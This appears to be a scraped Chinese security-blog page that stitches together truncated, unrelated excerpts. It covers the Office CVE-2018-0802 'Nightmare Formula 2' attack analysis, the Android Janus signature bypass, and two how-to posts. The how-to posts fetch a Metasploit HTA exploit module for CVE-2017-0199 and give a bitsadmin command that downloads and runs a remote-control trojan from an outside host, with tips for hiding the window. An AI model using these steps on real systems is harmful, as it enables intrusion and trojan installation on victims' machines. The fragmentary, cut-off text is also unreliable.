漏洞触发

let a = ”;
let b = ‘A’.repeat(0x10000);
for

简介

2018年1月的微软安全补丁中修复了360核心安全高级威胁应对团队捕获的office 0day漏洞（CVE-2018-0802），该漏洞几乎影响微软目前所支持的所有office版本。这是继360在全球范围内首家截获Office 0day漏洞（CVE-2017-11826）在野攻击以来，发现的第二起利用零日漏洞的在野高级威胁攻击。360核心安全团队一直与微软保持积极沟通，一起推进该0day漏洞的修复，让漏洞得到妥善解决后再披露漏洞信息。该漏洞的技术原理类似于潜伏了17年的“噩梦公式”漏洞(CVE-2017-11882），是黑客利用office内嵌的公式编辑器EQNEDT32.EXE再次发起的攻击，我们将其命名为“噩梦公式二代”（CVE-2018-0802）。

攻击流程分析

我们捕获了多个“噩梦公式二代”的在野攻击，在野样本嵌入了利用Nday漏洞和0day漏洞的2个公式对象同时进行攻击，Nday漏洞可以攻击未打补丁的系统，0day漏洞则攻击全补丁系统，绕过了CVE-2017-11882补丁的ASLR（地址随机化）安全保护措施，攻击最终将在用户电脑中植入恶意的远程控制程序。

图：“噩梦公式二代”在野样本攻击流程

漏洞细节分析

CPU特性漏洞测试POC(Meltdown and Spectre)

近日，Google在12月发布的安卓系统安全公告中披露了一个名为“Janus”安卓漏洞（漏洞编号：CVE-2017-13156）。该漏洞可以让攻击者绕过安卓系统的signature scheme V1签名机制，进而直接对App进行篡改。而且由于安卓系统的其他安全机制也是建立在签名和校验基础之上，该漏洞相当于绕过了安卓系统的整个安全机制。

一旦攻击者将植入恶意代码的仿冒的App投放到安卓商店等第三方应用市场，就可替代原有的App做下载、更新。网友安装这些仿冒App后，不仅会泄露个人账号、密码、照片、文件等隐私信息，手机更可能被植入木马病毒，进而或导致手机被ROOT，甚至被远程操控。

在第一时间监测到“janus”漏洞的情况后，顶象技术及时更新了“安全SDK”的防御策略，并率先发布了针对该漏洞的防护方案，以帮助广大用户防范基于该漏洞的攻击威胁。

分析显示，安卓5.0到8.0系统以及基于signature scheme V1签名机制的App均受“Janus”漏洞影响；基于signature …

大家好，我是Alex。今天教大家简单复现一个office漏洞CVE-2017-0199

下载漏洞利用脚本

wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb

然后移动rb脚本到/usr/share/metasploit-framework/modules/exploits/windows/fileformat，然后打开msf生成hta文件链接

然后使用刚才下载的exp设置参数

Run后复制文件到靶机测试

查看回话

…

大家好，我是Alex。今天教大家有效利用OFFICE这个漏洞！首先使用HTA脚本远程下载和执行远控马~

新建一个HTA脚本

bitsadmin /transfer officehttp://192.168.1.19:81/office.exe c:\office.exe & c:\office.exe

PS：加入/setpriority来提高任务的优先级（加速），加入vbhide来隐藏下图那恼人的窗口

上传到web目录或者使用其他工具建立下载链接…